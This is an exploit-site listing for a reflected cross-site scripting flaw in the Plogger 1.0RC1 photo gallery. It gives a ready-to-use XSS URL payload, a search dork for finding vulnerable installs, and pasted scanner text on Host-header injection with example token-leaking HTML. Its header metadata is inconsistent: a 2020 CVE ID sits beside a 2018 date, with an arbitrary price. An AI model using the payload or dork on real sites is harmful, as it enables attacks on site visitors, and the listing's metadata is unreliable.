Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-12456 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-03-21 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H | 0.85849 | 0.12402 |
============================================= | # Title : plogger1.0RC1 Xss Vulnerability | # Author : indoushka | # Vondor : http://www.plogger.org/ | # Dork: : Powered by Plogger ============================================ Xss : http://127.0.0.1/plogger/index.php?jump-menu=%2523%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E\%3d%22 Host header attack : Vulnerability description : An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <link href="http://_SERVER['HOST']" (Joomla) ...and append secret keys and tokens to links containing it: <a href="http://_SERVER['HOST']?token=topsecret"> (Django, Gallery, others) ....and even directly import scripts from it: <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4"> (Various) This vulnerability affects /plogger/index.php. Discovered by: Scripting (Host_Header_Attack.script). Attack details Host header evilhostSbZSkCwm.com was reflected inside a FORM tag (action attribute). http://127.0.0.1/plogger/plog-admin/_upgrade.php/plog-rpc.php Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.